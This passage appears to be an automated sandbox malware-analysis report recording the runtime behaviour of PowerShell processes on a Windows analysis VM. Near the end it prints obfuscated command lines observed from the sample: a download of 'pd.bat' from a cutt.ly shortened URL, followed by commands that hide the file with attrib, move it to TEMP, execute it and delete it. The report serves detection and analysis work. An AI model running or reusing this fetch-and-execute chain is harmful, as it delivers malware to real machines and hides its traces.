Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3699Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3775Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2803Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4856Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2903Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2455Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2895Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4801Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3109Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2869Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4672Thread sleep count: 3699 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6560Thread sleep count: 53 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep count: 3775 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7020Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7020Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep count: 2803 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep count: 4856 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6892Thread sleep count: 51 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4856Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6568Thread sleep count: 2903 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep count: 55 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6568Thread sleep count: 2455 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5936Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5936Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6992Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep count: 2895 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep count: 4801 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7036Thread sleep count: 62 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5848Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep count: 3109 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6576Thread sleep count: 2869 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep count: 57 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6124Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6124Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6680Thread sleep time: -30000s >= -30000sJump to behavior
Source: powershell.exe, 00000009.00000002.964579603.000000000498A000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.947822484.000000000553A000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.964870701.0000000004A6B000.00000004.00000001.sdmpBinary or memory string: Hyper-V
Source: powershell.exe, 00000006.00000002.939635054.0000000005381000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.963794619.00000000048C2000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.947822484.000000000553A000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.964870701.0000000004A6B000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpBinary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.batJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
